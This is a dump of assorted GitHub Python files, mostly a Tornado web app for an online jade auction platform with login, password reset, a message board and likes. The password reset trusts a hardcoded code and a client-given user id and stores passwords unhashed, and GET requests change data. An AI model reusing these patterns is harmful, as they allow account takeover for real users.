new_time\n","repo_name":"dr-rompecabezas/time-calculator","sub_path":"time_calculator.py","file_name":"time_calculator.py","file_ext":"py","file_size_in_byte":3180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"7593444489","text":"class Solution:\n\n def letterCombinations(self, digits: str) -> List[str]:\n result = []\n if digits is None or len(digits) is 0:\n return result\n codes = {'0': ['0'],\n '1': ['1'],\n '2': ['a', 'b', 'c'],\n '3': ['d', 'e', 'f'],\n '4': ['g', 'h', 'i'],\n '5': ['j', 'k', 'l'],\n '6': ['m', 'n', 'o'],\n '7': ['p', 'q', 'r', 's'],\n '8': ['t', 'u', 'v'],\n '9': ['w', 'x', 'y', 'z']}\n arr = [None] * len(digits)\n self.findcombinations(codes, 0, digits, result, arr)\n return result\n\n def findcombinations(self, codes, index, digits, result, arr):\n if index == len(digits):\n result.append(''.join(arr))\n return None\n\n curr_ = digits[index]\n chars = codes[curr_]\n\n for i in range(len(chars)):\n arr[index] = chars[i]\n self.findcombinations(codes, index + 1, digits, result, arr)\n","repo_name":"skumarUK/algo-experts","sub_path":"python/sandeepk/recursive/TelephoneWords.py","file_name":"TelephoneWords.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"14001871834","text":"#!/usr/bin/env python3\n# encoding: utf-8\nimport sys\n\nimport npyscreen\nfrom requests import get\n\nimport inputForm\nimport profileSelector\n\n# GLOBALS ATTRIBUTES\nAPP = None\nGATEWAY = None\nTHREADS = list()\nVM = None\nVMs = None\nSECURITY_GROUP = None\nSECURITY_RULE = None\nIP = get(\"https://api.ipify.org\").text\n# Because it's cool but also a DDOS attack :)\n# So let's be cool with the API --> No auto refresh!\nPOLL_ENABLED = False\n\n# GLOBALS METHODS\n\n\ndef add_thread(t):\n THREADS.append(t)\n\n\ndef kill_threads():\n for t in THREADS:\n t.stop()\n t.join()\n\n\ndef exit():\n kill_threads()\n sys.exit(0)\n\n\n# APPLICATION CLASS\n\n\nclass App(npyscreen.StandardApp):\n def onStart(self):\n npyscreen.setTheme(npyscreen.Themes.ColorfulTheme)\n self.addForm(\"MAIN\", profileSelector.ProfileSelector,\n name=\"osc-cli-curses\")\n\n\n# LET'S RUN\nif __name__ == \"__main__\":\n APP = App()\n APP.run()\n","repo_name":"outscale-fne/osc-cli-curses","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"32502371130","text":"import facebook\r\n\"\"\"IMPORTANT: Facebook doesn't allow any more automated post so this script doesn't work any more :( \"\"\"\r\nFACEBOOK_PAGE_ID = \"aaa\"\r\nACCESS_TOKEN = \"aaa\"\r\n \r\ndef PostString(graph_instance, txt):\r\n \"\"\"Returns a Boolean\r\n\r\n Post a text\r\n \"\"\"\r\n try:\r\n graph_instance.put_object(FACEBOOK_PAGE_ID, \"feed\", message=txt)\r\n except:\r\n print(\"Exception at PostString\")\r\n return False\r\n return True\r\n \r\ndef GetGraphInstance():\r\n \"\"\"Returns a facebook GraphicAPI instance object\r\n\r\n Returns GraphAPI instance\r\n \"\"\"\r\n instance = facebook.GraphAPI(access_token=ACCESS_TOKEN)\r\n print(\"Session:\", instance.session)\r\n return instance\r\n\r\ndef PostImage(graph_instance, img_route, msg):\r\n \"\"\"Returns a Boolean\r\n\r\n Post an image\r\n \"\"\"\r\n try:\r\n image = open(img_route, 'rb')\r\n except:\r\n print(\"Exception at PostImage\")\r\n return False\r\n graph_instance.put_photo(image, message=msg)\r\n return True\r\n\r\n# EXAMPLE:\r\n# PostImage(GetGraphInstance(), 'image_generated.png', '')\r\n","repo_name":"AgustinMachiavello/StarStickersForEverythingBot","sub_path":"SSGDjango/starstickersdjango/apps/starstickergenerator/scripts/FacebookApi.py","file_name":"FacebookApi.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"83"} +{"seq_id":"35006338714","text":"from flask import Flask, render_template, request\nimport covid19_stateprediction as cov\napp = Flask(__name__)\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n@app.route('/graph', methods=[\"GET\",\"POST\"])\ndef my_link():\n if request.method == 'POST':\n result = request.form\n state = result['state']\n html = cov.lambda_handler(state)\n return render_template('graph.html')\n\nif __name__ == '__main__':\n app.run(debug=True)","repo_name":"shobhitsrivastava-ds/ML-MT-WebApp","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","stars":174,"dataset":"github-code","pt":"83"} +{"seq_id":"13726803198","text":"import cv2\nimport mediapipe as mp\nimport time\n\nclass poseDetector():\n\n def __init__(self,\n static_image_mode=False,\n model_complexity=1,\n smooth_landmarks=True,\n enable_segmentation=False,\n smooth_segmentation=True,\n min_detection_confidence=0.5,\n min_tracking_confidence=0.5):\n self.mode = static_image_mode\n self.complexity = model_complexity\n self.landmarks = smooth_landmarks\n self.enable_segmentation = enable_segmentation\n self.smooth_segmentation = smooth_segmentation\n self.detection_confidence = min_detection_confidence\n self.tracking_confidence = min_tracking_confidence\n self.mpPose = mp.solutions.pose\n self.pose = self.mpPose.Pose(static_image_mode=self.mode,\n model_complexity=self.complexity,\n smooth_landmarks=self.landmarks,\n enable_segmentation=self.enable_segmentation,\n smooth_segmentation=self.smooth_segmentation,\n min_detection_confidence=self.detection_confidence,\n min_tracking_confidence=self.tracking_confidence)\n self.mpDraw = mp.solutions.drawing_utils\n self.results= None\n\n \n def findPose(self, img, draw=True):\n imgRGB = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n self.results = self.pose.process(imgRGB)\n if draw and self.results.pose_landmarks:\n self.mpDraw.draw_landmarks(img, self.results.pose_landmarks,\n self.mpPose.POSE_CONNECTIONS)\n \n def getPosition(self, img, draw=True):\n lmList = []\n if self.results.pose_landmarks:\n for id, lm in enumerate(self.results.pose_landmarks.landmark):\n # Note: lm.x and lm.y is not going to be the position of points on the image, rather it give the point ration \n # I muliply by width and height to get the pixel coordinate\n h, w, _= img.shape\n cx, cy = int(lm.x*w), int(lm.y*h)\n lmList.append([id, cx, cy])\n if draw:\n cv2.circle(img, (cx,cy), 10, (255, 0,0), cv2.FILLED)\n return lmList\n \n\n\n\n\ndef main():\n cap = cv2.VideoCapture('PoseVideos/3.mp4')\n pTime = 0\n detector = poseDetector()\n while True:\n success, img = cap.read()\n detector.findPose(img)\n lmList = detector.getPosition(img)\n # trying to find the fps of the video that is playing\n cTime = time.time()\n fps = 1/(cTime-pTime)\n pTime = cTime\n # Adding text so frame rate is visible\n cv2.putText(img, str(int(fps)), (70,50), cv2.FONT_HERSHEY_PLAIN, 3, (255, 0,0), 3)\n\n cv2.imshow(\"Image:\", img)\n cv2.waitKey(1)\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"natek-1/ComputerVision","sub_path":"PoseModule.py","file_name":"PoseModule.py","file_ext":"py","file_size_in_byte":3000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"35886832209","text":"import os\r\n\r\n\r\npath = \"./mlm_evalnew\" #文件夹目录\r\noutput = \"。/valid.txt\"\r\nout = open(output,\"w\")\r\nqa_set = []\r\nfor root, dirs, files in os.walk(path):\r\n for file in files:\r\n str1 = os.path.join(root,file)\r\n file = open(str1,\"r\")\r\n s = file.read()\r\n w = out.write(s)\r\n w = out.write('\\n')\r\n","repo_name":"Smallqqqq/DeployQA","sub_path":"DeployQA/mlm/mlm_processor.py","file_name":"mlm_processor.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"19182612777","text":"# Error 생성 Exception 처리\nclass BigNumberError(Exception):\n def __init__(self, message):\n self.message = message\n\n def __str__(self):\n return self.message\n\n\ntry:\n print(\"한 자리 숫자 나누기 전용 계산기\")\n num1 = int(input(\"첫 번째 숫자를 입력하세요: \"))\n num2 = int(input(\"두 번째 숫자를 입력하세요: \"))\n if num1 >= 10 or num2 >= 10:\n raise BigNumberError(\"입력값: {0}, {1}\".format(num1, num2))\n print(\"{0} / {1} = {2}\".format(num1, num2, int(num1/num2)))\nexcept ValueError:\n print(\"잘못된 값을 입력했습니다.\")\nexcept BigNumberError as ex:\n print(\"오류: 한 자리 숫자만 입력하세요\")\n print(ex)\n# try 실행 시 Error 발생 여부와 상관없이 실행\nfinally:\n print(\"계산기를 이용해 주셔서 감사합니다.\")\n","repo_name":"dmlee19/PythonTutorial","sub_path":"i_exception/createException.py","file_name":"createException.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"5962639982","text":"# utf:8\nimport copy\n\nimport os.path\nimport json\nimport yaml\nfrom datetime import datetime\n\n\nimport tornado\nfrom tornado import escape, gen, httpserver, ioloop, web, websocket\n\nfrom sqlalchemy.exc import IntegrityError,DBAPIError\nfrom sqlalchemy import func\n\nfrom ORM import Session\nfrom ORM.Tables.User import User\n\nfrom ORM.Tables.Praise import MessagePraise\nfrom ORM.Tables.Message import MessageBoard\nfrom ORM.Tables.UserBank import UserBank\nfrom ORM.Tables.OrderSub import OrderSub\nfrom ORM.Tables.UserWithdraw import UserWithdraw\nfrom ORM.Tables.Product import Product\n\nfrom ORM.Tables.ChinaAreas import ChinaAreas\n\nimport Common\nfrom Commands.Command import Command\nfrom Commands.UserHandler import UserHandler\nfrom Commands.ProductHandler import ProductHandler\nfrom Commands.OrderHandler import OrderHandler\nfrom Commands.OrderDealHandler import OrderDealHandler\n\nimport logging\nimport logging.config\n\nimport redis\nimport math, operator, time\n\nfrom Configuration import ConfigParser\n\n\nclass Application(tornado.web.Application):\n\n def __init__(self):\n\n logging.config.dictConfig(yaml.load(open(os.path.realpath('log.yaml'), 'r')))\n logging.getLogger('sqlalchemy.engine').setLevel(logging.DEBUG)\n logging.getLogger('sqlalchemy.pool').setLevel(logging.WARN)\n\n\n handlers = [\n (r\"/\", HomeHandler),\n # 增加 demo,\n (r\"/user/ajax_login\",UserAjaxLogin),\n #用户注册\n (r\"/url/numregisted\",UserNumRegisted),\n #忘记密码\n (r\"/url/forget_password\",UserForgetPassword),\n # 发送验证码\n (r\"/url/sendcode\",UserSendCodeHandler),\n #找回密码的验证\n (r\"/url/identity_check\",UserIdentityCheck),\n\n # 留言板\n (r\"/user/message\", UserMessageHandler),\n\n # 留言板列表\n (r\"/user/message_details\",MessageListHandler),\n\n # 删除留言列表\n (r\"/user/message_delete\",MessageDeleteHandler),\n\n # 追加留言\n (r\"/user/message_addition\",MessageAdditionHandler),\n\n # 留言置顶\n # (r\"/user/message_top\",MessageTopHandler),\n\n # 点赞功能\n (r\"/user/getpraise\",GetPraiseHandler),\n\n # 新增加收货地址\n (r\"/user/show_add_address\",ShopAddrssHandler),\n\n (r\"/user/create\", UserCreateHandler),\n (r\"/user/login\", UserLoginHandler),\n (r\"/user/logout\", UserLogoutHandler),\n (r\"/user/console\", UserConsoleHandler),\n (r\"/user/profile\", UserProfileHandler),\n (r\"/user/update\", UserUpdateHandler),\n (r\"/user/wallet\", UserWalletHandler),\n (r\"/user/withdraw\", UserWithdrawHandler),\n (r\"/user/withdraw-history\", UserWithdrawHistoryHandler),\n (r\"/user/deposit-history\", UserDepositHistoryHandler),\n (r\"/user/subbuy\", UserSubBuyHandler),\n (r\"/user/buy\", UserBuyHandler),\n (r\"/user/sale\", UserSaleHandler),\n (r\"/user/orders\", UserOrdersHandler),\n (r\"/transaction\", TransactionSocketHandler),\n (r\"/product/list\", ProductListHandler),\n (r\"/product/detail\", ProductDetailHandler),\n (r\"/product/buy\", ProductBuyHandler),\n (r\"/product/sale\", ProductSaleHandler),\n (r\"/product/order\", ProductOrderHandler),\n (r\"/product/assets\", ProductAssetsHandler),\n (r\"/order/cancel\", OrderCancelHandler),\n (r\"/bank/create\", BankCreateHandler),\n (r\"/api/transaction/products\", TransactionProductsHandler)\n ]\n\n settings = dict(\n site_title=u\"吾品玉艺玉文化产权拍卖服务平台\",\n template_path=os.path.join(os.path.dirname(__file__), \"WWW/templates\"),\n static_path=os.path.join(os.path.dirname(__file__), \"WWW/static\"),\n #ui_modules={\"Entry\": EntryModule},\n xsrf_cookie=True,\n cookie_secret=\"xxddfewr44343gfd32dsf3ds22d\",\n debug=True,\n )\n\n super(Application, self).__init__(handlers, **settings)\n\n self.session = Session()\n\n try:\n self.redis = redis.StrictRedis(ConfigParser.get('wx.redis.config','host'),ConfigParser.get('wx.redis.config','port'))\n\n except redis.ConnectionError as e:\n logging.warning(e.args[0])\n exit(0)\n else:\n logging.info('Connected to the redis:{}....'.format(self.redis))\n\n\n\nclass BaseHandler(tornado.web.RequestHandler): # BHandler,可以自定义采用的模板,所有的handler都继承这个类\n\n @property\n def session(self):\n return self.application.session\n\n @property\n def redis(self):\n return self.application.redis\n# 验证用户登录状态 user_id\n def get_current_user(self):\n user_id = self.get_secure_cookie(\"wx_user_id\")\n if not user_id:\n return None\n\n #TODO only return the user object and need sub class to check user status\n try:\n user = self.session.query(User).get(user_id)\n except DBAPIError as e :\n self.session.rollback()\n if e.connection_invalidated:\n logging.warning('database connection invalid')\n finally:\n self.session.close()\n\n if not user:\n user = self.session.query(User).get(user_id)\n\n return user\n\nclass HomeHandler(BaseHandler):\n\n def get(self):\n referrer = self.get_query_argument('referrer',0)\n self.set_secure_cookie('referrer_id', str(referrer))\n\n self.render(\"home.html\",referrer=referrer)\n\nclass UserCreateHandler(BaseHandler):\n\n def get(self):\n self.render(\"user/create.html\", referrer_id=self.get_secure_cookie('referrer_id'))\n\n def post(self):\n user = User()\n user.login_name = self.get_argument('login_name')\n user.login_pass = User.encrypt_pass(self.get_argument('login_pass'))\n user.real_name = self.get_argument('realname')\n user.id_no = self.get_argument('id_no')\n user.mobile = self.get_argument('mobile')\n\n if self.get_argument('display_name',None):\n user.display_name = self.get_argument('display_name')\n else:\n user.display_name = user.login_name\n\n user.status = User.UserStatusPending\n\n user.referrer_id = self.get_argument('referrer', 0)\n\n if UserHandler.checkIdNo(user.id_no):\n data = {'result': 'error', 'msg': '身份证号码已被注册!'}\n self.write(json.JSONEncoder().encode(data))\n return\n\n try:\n self.session.add(user)\n self.session.commit()\n\n data = {'result': 'success', 'msg': user.id}\n self.write(json.JSONEncoder().encode(data))\n except IntegrityError as e:\n self.session.close()\n if 'login_name' in e.args[0]:\n msg = self.get_argument('login_name') + ' 已经被注册!'\n elif 'mobile' in e.args[0]:\n msg = self.get_argument('mobile') + ' 已经被注册!'\n else:\n msg = '未知错误,请联系平台处理'\n\n data = {'result':'error', 'msg':msg}\n self.write(json.JSONEncoder().encode(data))\n\n except DBAPIError as e:\n if e.connection_invalidated:\n logging.warning('database connection invalid')\n\n data = {'result': 'error', 'msg': 'database connection invalid'}\n self.write(json.JSONEncoder().encode(data))\n except Exception as e:\n print(e.args[0])\n\n finally:\n self.session.close()\n\n\n\nclass UserNumRegisted(BaseHandler):\n # 判断用户是否注册,yes:跳转到登录页面\n def get(self):\n self.render(\"user/login.html\",error=None)\n def post(self):\n pass\n\n # no,注册\n\n\n# 用户忘记密码\nclass UserForgetPassword(BaseHandler):\n\n def get(self):\n self.render(\"user/forget_password.html\", error=None)\n\n\n# 发送验证码:调用第三方接口,获取用户的手机号码,发送验证码\nclass UserSendCodeHandler(BaseHandler):\n\n def post(self):\n mobile = self.get_argument('mobile')\n data = {}\n data['result'] = 'success'\n data['code'] = '2222'\n self.write(json.JSONEncoder().encode(data))\n\n\n\n\n# 提交验证:验证码以及密码\nclass UserIdentityCheck(BaseHandler):\n\n def post(self):\n # user = User()\n\n user_id = self.get_argument('wx-user-id')\n mobile = self.get_argument('mobile')\n code = self.get_argument('code')\n newpassword = self.get_argument('newpassword')\n confirmnewpassword = self.get_argument('confirmnewpassword')\n\n if code =='123456':\n # 更新数据库的密码信息:\n self.session.query(User.mobile,User.login_pass).filter(User.id == user_id).update({User.mobile:mobile,User.login_pass:confirmnewpassword})\n self.session.commit()\n # self.session.query(User).filter(User.id == user_id).update({col: value})\n data = {'result':'success','msg':'数据插入成功'}\n else:\n data = {'result':'error','msg':'密码插入失败'}\n\n self.write(json.JSONEncoder().encode(data))\n\n\n\n # # 这是在后端进行验证\n # if code == '123456':\n # newpassword = self.get_argument('newpassword')\n # confirmnewpassword = self.get_argument('confirmnewpassword')\n # if newpassword == confirmnewpassword and len(newpassword)>0:\n # # 数据库密码更新的操作\n # msg = '恭喜,密码设置成功'\n # data = {'result':'success','msg':msg}\n #\n # elif newpassword != confirmnewpassword:\n # msg = '抱歉,两次密码输入不正确'\n # data = {'result':'error','msg':msg}\n # else:\n # msg ='密码不能为空'\n # data = {'result': 'error', 'msg': msg}\n # self.write(json.JSONEncoder().encode(data)) # 不需要每个else里都写一遍。\n # else:\n # msg = \"您输入的验证码不正确\"\n # data = {'result':'error','msg':msg}\n # self.write(json.JSONEncoder().encode(data))\n\n\n\n# 这个方法是用于解决datetime没有办法序列化的问题\n#TypeError: Object of type 'datetime' is not JSON serializable\nclass CJsonEncoder(json.JSONEncoder):\n\n def default(self,obj):\n if isinstance(obj,datetime):\n return obj.strftime('%Y-%m-%d %H:%M:%S')\n else:\n return json.JSONEncoder.default(self,obj)\n\n\n\n\nclass UserMessageHandler(BaseHandler):\n\n def get(self):\n\n user_id = self.get_argument(\"user_id\")\n\n top_flag_id = self.get_argument('top_flag_id')\n print('----------------'+top_flag_id)\n\n isTOP = self.session.query(MessageBoard).filter(MessageBoard.id == top_flag_id).update({MessageBoard.isTOP:1,MessageBoard.created_at:datetime.now()})\n # addition_id = self.get_argument('addition_id')\n # print('parentid+++++&&&&+++++'+addition_id)\n # print(isTOP)\n self.session.commit()\n\n\n reply_lists = self.session.query(MessageBoard.parentid,MessageBoard.user_name, MessageBoard.comment,MessageBoard.created_at).filter(MessageBoard.check_status == 2).order_by( MessageBoard.created_at.desc()).all()\n print('this result is reply_list:')\n print(reply_lists)\n\n check_praise_num = self.session.query(MessagePraise.message_id,func.count('*').label('message_count')).group_by(MessagePraise.message_id).all()\n print(\"分组统计check_praise_num:\")\n print(check_praise_num)\n\n check_message_praise = self.session.query(MessagePraise.user_id, MessagePraise.message_id).all()\n\n if isTOP:\n\n message_lists = self.session.query(MessageBoard.id,MessageBoard.user_name,MessageBoard.comment,MessageBoard.created_at,MessageBoard.praise_num,MessageBoard.is_praise).filter(MessageBoard.check_status==0).order_by(MessageBoard.created_at.desc(),MessageBoard.isTOP.desc()).limit(6).all()\n\n mergeds = []\n for message_list in message_lists:\n li = []\n li.append(message_list)\n for reply_list in reply_lists:\n if reply_list.parentid == message_list.id:\n li.append(reply_list)\n mergeds.append(li)\n\n print(mergeds)\n print('ppppppppppppppppppppppppppppppp')\n\n\n my_list = []\n for sencode_list in mergeds: # 遍历已经处理好的子评论追加到对应的主评论上\n # print(sencode_list)\n\n if len(sencode_list) != 1: # 判断:如果list的长度为1的话,只有主评论\n children_lists = copy.deepcopy(sencode_list) # 这里是deepcopy的知识点,不会破坏原先的数据\n # print('result children_lists')\n print(children_lists)\n children_lists.remove(children_lists[0]) # 踢出主评论,元素位置为[0]\n my_list.append(children_lists)\n # print('remove the list[0]')\n # print(children_lists)\n print (my_list)\n\n self.render(\"user/message_board.html\", message_lists = mergeds,children_lists=my_list,check_message_praise=check_message_praise,user_id=user_id)\n\n else:\n message_lists = self.session.query(MessageBoard.id, MessageBoard.user_name, MessageBoard.comment,MessageBoard.created_at,MessageBoard.praise_num,MessageBoard.is_praise).filter(MessageBoard.check_status == 0).order_by(MessageBoard.created_at.desc()).limit(6).all()\n mergeds = []\n # children_lists=[]\n for message_list in message_lists:\n li = []\n li.append(message_list)\n for reply_list in reply_lists:\n if reply_list.parentid == message_list.id:\n li.append(reply_list)\n mergeds.append(li)\n print(mergeds)\n\n\n my_list = []\n for sencode_list in mergeds: # 遍历已经处理好的子评论追加到对应的主评论上\n # print(sencode_list)\n\n if len(sencode_list) != 1: # 判断:如果list的长度为1的话,只有主评论\n children_lists = copy.deepcopy(sencode_list) # 这里是deepcopy的知识点,不会破坏原先的数据\n # print('result children_lists')\n print(children_lists)\n children_lists.remove(children_lists[0]) # 踢出主评论,元素位置为[0]\n my_list.append(children_lists)\n # print('remove the list[0]')\n # print(children_lists)\n print (my_list)\n\n self.render(\"user/message_board.html\", message_lists = mergeds,children_lists=my_list,check_message_praise=check_message_praise,user_id=user_id)\n\n\n\n\n\n def post(self):\n comments= self.get_argument('comments')\n user_name = self.get_argument('user_name')\n check_status = self.get_argument('check_status')\n create_time = datetime.now()\n\n\n user_id = 1\n #user_id 可以通过user_name为条件 查询用户表得到 select user_id from user where user_name='1'\n message = MessageBoard()\n message.comment = comments\n message.user_name = user_name\n message.check_status = check_status\n message.created_at = create_time\n message.user_id = user_id\n # id = self.session.query(MessageBoard.id).filter(MessageBoard.user_name == user_name ).one_or_none()\n # print(id)\n\n# 数据提交操作\n try:\n self.session.add(message)\n self.session.commit()\n except DBAPIError as e:\n print(e.args[0])\n data = {'result': 'error', 'msg': 'Error to save!'}\n else:\n data = {'comments': comments, 'user_name':user_name,'create_time':create_time,'msg':message.id}\n\n finally:\n self.session.close()\n\n self.write(json.dumps(data,cls=CJsonEncoder)) # 将dict转换成json\n\n\n# 评论详情\nclass MessageListHandler(BaseHandler):\n\n def get(self):\n message_id = self.get_argument('message_id')\n message_list = self.session.query(MessageBoard.comment).filter(MessageBoard.id == message_id)\n\n self.render(\"user/message_details.html\", message_list=message_list)\n\n\n# 列表的删除\nclass MessageDeleteHandler(BaseHandler):\n\n def post(self):\n delete_id = self.get_argument('delete_id')\n print (delete_id)\n\n delete_message = self.session.query(MessageBoard).filter(MessageBoard.id == delete_id).delete()\n self.session.commit() # 记得数据的修改操作一定要提交,查询操作可以不用commit\n\n if delete_message:\n msg = \"删除成功\"\n data = {'result': 'success', 'msg': msg}\n else:\n data = {'result': 'error', 'msg': '删除错误'}\n\n self.write(json.JSONEncoder().encode(data))\n\n\nclass MessageAdditionHandler(BaseHandler):\n\n def get(self):\n addition_id = self.get_argument('addition_id')\n print('^^^^^^^addition_id***********@@@@@@@@@@!!!!!!'+addition_id)\n\n is_added=self.session.query(MessageBoard).filter(MessageBoard.id == addition_id).update({MessageBoard.isadded:1})\n self.session.commit()\n if is_added:\n add_message = self.session.query(MessageBoard.user_name, MessageBoard.comment,MessageBoard.created_at).filter(MessageBoard.isadded == 1).order_by(MessageBoard.created_at.desc()).all()\n # print (add_message)\n # self.render(\"user/message_board.html\",add_message=add_message)\n else:\n return 0\n\n #isadded 字段更新\n def post(self):\n\n comments = self.get_argument('comments')\n user_name = self.get_argument('user_name')\n check_status = self.get_argument('check_status')\n parentid = self.get_argument('parentid')\n create_time = datetime.now()\n user_id = 1\n # user_id 可以通过user_name为条件 查询用户表得到 select user_id from user where user_name='1'\n message = MessageBoard()\n message.comment = comments\n message.user_name = user_name\n message.check_status = check_status\n message.created_at = create_time\n message.user_id = user_id\n message.parentid = parentid\n # 数据提交操作\n try:\n self.session.add(message)\n self.session.commit()\n except DBAPIError as e:\n print(e.args[0])\n data = {'result': 'error', 'msg': 'Error to save!'}\n else:\n data = {'comments': comments, 'user_name': user_name, 'create_time': create_time}\n\n finally:\n self.session.close()\n\n self.write(json.dumps(data, cls=CJsonEncoder)) # 将dict转换成json\n\n # 留言的置顶\n# class MessageTopHandler(BaseHandler):\n\n # def post(self):\n #\n # top_flag_id = self.get_argument('top_flag_id')\n # print (top_flag_id)\n #\n # try:\n # self.session.query(MessageBoard).filter(MessageBoard.id == top_flag_id).update({MessageBoard.isTOP:1})\n # top_message =self.session.query(MessageBoard.id,MessageBoard.created_at).order_by(MessageBoard.isTOP ,MessageBoard.created_at.desc()).all()\n # self.session.commit()\n # print (top_message)\n # except DBAPIError as e:\n # self.session.rollback()\n # data = {'result':'error','msg':e.args[0]}\n # self.write(json.JSONEncoder().encode(data))\n # else:\n # data = {'result': 'success', 'msg': 'okay'}\n # self.write(json.JSONEncoder().encode(data))\n # self.render(\"user/message_board.html\", message_list=top_message)\n #\n # finally:\n # self.session.close()\n\n\nclass GetPraiseHandler(BaseHandler):\n\n\n def get(self):\n\n praise_id = self.get_argument('praise_id')\n print(\"the praise_id is:\")\n print(praise_id)\n\n # 判断用户是否登录\n user_id = self.get_secure_cookie(\"wx-user-id\")\n print('self.get_secure_cookie user_id:')\n print (user_id)\n real_user_id = self.get_argument(\"user_id\")\n # 查询另一张表里的用户id,文章id\n message_praise = self.session.query(MessagePraise.user_id,MessagePraise.message_id).all()\n print(\"mysql message_praise\")\n print(message_praise)\n resent_praise =(int(real_user_id),int(praise_id)) # 将string转换成int\n print(resent_praise)\n\n if resent_praise in message_praise:\n print(\"***8***8*****8******\")\n # 删除\n self.session.query(MessagePraise.id,MessagePraise.user_id,MessagePraise.message_id).filter(MessagePraise.message_id == praise_id,MessagePraise.user_id==real_user_id).delete()\n # 文章计数 -1\n praise_num = self.session.query(MessageBoard).filter(MessageBoard.id == praise_id).update({MessageBoard.praise_num:MessageBoard.praise_num - \"1\"})\n\n print(\"****\",praise_id,\"*******\")\n check_praise_num = self.session.query(func.count('MessagePraise.*')).filter(MessagePraise.message_id == praise_id).one_or_none()\n result_list = self.session.query(MessagePraise.user_id,MessagePraise.message_id).all()\n\n print(\"删除后的数据结构是这样的:\")\n print(result_list)\n self.session.commit\n #check_praise_num = self.session.query(MessagePraise).filter(MessagePraise.message_id == 7).count()\n\n print(\"取消赞的时候,数据库-1:\")\n print(check_praise_num)\n data = {'result':'error','msg':'您已取消点赞','praise_num':check_praise_num[0]}\n\n\n\n\n self.write(json.JSONEncoder().encode(data))\n\n else:\n praise = MessagePraise()\n praise.user_id = real_user_id\n praise.message_id = praise_id\n\n # 文章计数 +1\n\n praise_num = self.session.query(MessageBoard.praise_num).filter(MessageBoard.id == praise_id).update({MessageBoard.praise_num:MessageBoard.praise_num + \"1\"})\n\n # check_praise_num = self.session.query(MessageBoard.praise_num).filter(MessageBoard.id == praise_id).one_or_none()\n # check_praise_num = self.session.query(func.count('*')).filter(MessagePraise.message_id == praise_id ).limit(1).scalar()\n\n\n self.session.commit()\n\n\n try:\n self.session.add(praise)\n self.session.commit()\n except DBAPIError as e:\n print(e.args[0])\n data = {'result': 'error', 'msg': 'Error to save!'}\n else:\n check_praise_num = self.session.query(func.count('*')).filter(MessagePraise.message_id == praise_id).scalar()\n print(\"______praise_num______\")\n print(check_praise_num)\n data ={'result':'success','msg':'点赞成功','praise_num':check_praise_num}\n finally:\n self.session.close()\n print(\"+++++++==============++++++++============\")\n self.write(json.JSONEncoder().encode(data))\n\n\n# 显示收货地址\nclass ShopAddrssHandler(BaseHandler):\n\n def get(self):\n user_id = self.get_argument('user_id')\n provinceid = self.get_argument('provinceid')\n\n\n # 获取数据库里的省,市,区的数据\n area_provinces = self.session.query(ChinaAreas.id,ChinaAreas.parent,ChinaAreas.name,ChinaAreas.level).filter(ChinaAreas.level == 1).all()\n print('QQQQQQQPPPPPP#######@@@@!!!!area_list')\n area_citys = self.session.query(ChinaAreas.id,ChinaAreas.parent,ChinaAreas.name,ChinaAreas.level).filter(ChinaAreas.level == 2 and ChinaAreas.parent==provinceid).all()\n print(area_citys)\n area_districts = self.session.query(ChinaAreas.id,ChinaAreas.parent,ChinaAreas.name,ChinaAreas.level).filter(ChinaAreas.level == 3).all()\n\n self.render(\"user/show_add_address.html\", area_provinces=area_provinces,area_citys=area_citys,\n area_districts=area_districts)\n\n\n\n\n\n\n\n\n\nclass UserLoginHandler(BaseHandler):\n def get(self):\n if self.get_current_user():\n self.redirect(\"/user/profile\") # self.redirect 多数情况下被用于用户自定义的情况下进行重定向操作(例如环境变更、用户认证、以及表单提交)\n else:\n self.render(\"user/login.html\", error=None)\n\n @gen.coroutine\n def post(self):\n\n login_name = self.get_argument('login_name')\n login_pass = self.get_argument('login_pass')\n\n user = UserHandler.login(login_name, login_pass)\n\n if not user:\n data = {'result': 'error', 'msg':'用户名或密码错误'}\n else:\n if operator.eq(user.status, User.UserStatusFrozen):\n data = {'result': 'error', 'msg': '当前用户:{},已被冻结,请联系平台了解详情!'.format(user.login_name)}\n elif operator.eq(user.status, User.UserStatusBlack):\n data = {'result': 'error', 'msg': '当前用户:{},已被拉黑,已无权再登录!'.format(user.login_name)}\n else:\n data = {'result': 'success', 'msg':user.id}\n\n self.write(json.JSONEncoder().encode(data))\n\n\nclass UserAjaxLogin(BaseHandler):\n\n @gen.coroutine\n def post(self):\n ajax_login_name= self.get_argument(\"login_name\")\n ajax_login_pass= self.get_argument(\"login_pass\")\n\n user = UserHandler.login( ajax_login_name,ajax_login_pass)\n\n # 判断:用户是否存在\n if not user:\n data ={'result': 'error','msg':'该用户不存在'}\n else:\n data ={'result':'successful','msg':user.id}\n\n self.write(json.JSONEncoder().encode(data))\n\n\n\nclass UserLogoutHandler(BaseHandler):\n def get(self):\n self.clear_cookie(\"wx_user_id\")\n self.clear_cookie(\"wx_user_status\")\n self.redirect(self.get_argument(\"next\", \"/\"))\n\n\nclass UserConsoleHandler(BaseHandler):\n def post(self):\n user_id = self.get_argument('user_id', None) # None为默认值\n if not user_id:\n self.render('error.html', message='参数缺失!')\n return\n\n try:\n user = self.session.query(User).filter(User.deleted == 0, User.id == user_id).one_or_none()\n except DBAPIError as e:\n logging.warning(e.args[0])\n self.render('error.html', message='Error to query user')\n else:\n if user:\n suns = UserHandler.get_suns(user_id, 1)\n self.render('user/console.html', user=user, 